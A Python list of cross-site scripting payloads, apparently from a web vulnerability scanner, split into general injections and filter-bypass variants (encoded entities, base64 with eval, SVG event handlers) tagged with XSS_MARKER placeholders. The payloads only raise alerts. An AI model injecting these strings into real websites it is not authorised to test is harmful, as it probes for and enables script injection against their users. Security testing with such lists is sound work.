PAYLOADS = [
    #Umum
    "<script>alert('XSS_MARKER_{id}')</script>",
    '"><script>alert(\'XSS_MARKER_{id}\')</script>',
    "'><script>alert('XSS_MARKER_{id}')</script>",
    '<img src=x onerror=alert("XSS_MARKER_{id}")>',
    "<svg onload=alert('XSS_MARKER_{id}')></svg>",
    '"><img src=x onerror=alert(\'XSS_MARKER_{id}\')>',
    "'><img src=x onerror=alert('XSS_MARKER_{id}')>",
    '" onmouseover="alert(\'XSS_MARKER_{id}\')"',
    "' onmouseover='alert(\"XSS_MARKER_{id}\")'",
    "javascript:alert('XSS_MARKER_{id}')",
    "%3Cscript%3Ealert%28%27XSS_MARKER_{id}%27%29%3C%2Fscript%3E",
    "${alert('XSS_MARKER_{id}')}",
    "{{alert('XSS_MARKER_{id}')}}",
    "<div data-test=\"{id}\"><script>/*X*/alert('XSS_MARKER_{id}')</script></div>",
    "<a href='#' onclick='alert(\"XSS_MARKER_{id}\")'>click</a>",
    '<img src="x" srcset="x" onerror="alert(\'XSS_MARKER_{id}\')">',
    '"><img src=x onerror=prompt(1);>',
    '+123\'];alert(1);[[\'',
    "123',alert(1),'",
    '123\\",term:alert(1)//"',
    '123";alert`1`;//',
    '123\'\';!--"<XSS>=&{()}',
    "<script>alert(1)</script>",
    "')\"+onMouseOver=alert(1)+onx=(",
    '<img src=?itworksonchrome? onerror=alert(1);>',
    '"><img src="x:x" onerror=alert(\'xss\')>',
    '"><svg onload=prompt`xss`>',
    '"><input onfocus=alert(\'xss\') autofocus><"',
    "<details ontoggle=alert`xss`><summary>Click me to demonstrate the XSS</summary></details>",
    "<svg onload=alert(1)>",
    "<img src=x onerror=alert(1)>",
    "<img src=x onerror=alert`1`>",
    "<whatever/onpointerover='var a=alert;a(1)'>",
    "javascript:/*--></title></style></textarea></script>alert('XSS_MARKER_{id}')",
    
    #Bypass
    "<svg><animate onbegin=alert('XSS_MARKER_{id}') attributeName=x dur=1s>",
    "<svg><animate onend=alert('XSS_MARKER_{id}') attributeName=x dur=1s>",
    "<svg><set onbegin=alert('XSS_MARKER_{id}') attributename=x to=0>",
    "<math><maction actiontype='statusline#http://google.com' xlink:href=javascript:alert('XSS_MARKER_{id}')>",
    "<iframe srcdoc='<img src=x onerror=alert(`XSS_MARKER_{id}`)>'>",
    "<svg><script>alert('XSS_MARKER_{id}')</script>",
    "<svg><script>alert`XSS_MARKER_{id}`</script>",
    "<embed src=javascript:alert('XSS_MARKER_{id}')>",
    "<base href=javascript:alert('XSS_MARKER_{id}')//>",
    "<form><button formaction=javascript:alert('XSS_MARKER_{id}')>Click",
    "<keygen autofocus onfocus=alert('XSS_MARKER_{id}')>",
    "<isindex type=submit onsubmit='alert(\"XSS_MARKER_{id}\");return false;'>",
    "<object data=javascript:alert('XSS_MARKER_{id}')>",
    "<meta http-equiv='refresh' content='0;url=javascript:alert(\"XSS_MARKER_{id}\")'>",
    "<marquee onstart=alert('XSS_MARKER_{id}')>",
    "<audio src=x onerror=alert('XSS_MARKER_{id}')>",
    "<video><source onerror='alert(\"XSS_MARKER_{id}\")'>",
    "<body onload=alert('XSS_MARKER_{id}')>",
    "<plaintext onload=alert('XSS_MARKER_{id}')>",
    "<svg/onload=alert('XSS_MARKER_{id}')//",
    "<svg/onload=alert&lpar;'XSS_MARKER_{id}'&rpar;//",
    "<svg/onload=&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x5f;&#x4d;&#x41;&#x52;&#x4b;&#x45;&#x52;&#x5f;&#x7b;&#x69;&#x64;&#x7d;&#x27;&#x29;//",
    "<svg/onload=&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#95;&#77;&#65;&#82;&#75;&#69;&#82;&#95;&#123;&#105;&#100;&#125;&#39;&#41;//",
    "<svg/onload=eval(atob('YWxlcnQoIlhTU19NQVJLRVJfe2lkfSIp'))//",
    "<svg/onload=eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,95,77,65,82,75,69,82,95,123,105,100,125,39,41))//>",
    "<svg><script>eval(atob('YWxlcnQoIlhTU19NQVJLRVJfe2lkfSIp'))</script>",
    "<svg><script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,95,77,65,82,75,69,82,95,123,105,100,125,39,41))</script>",
]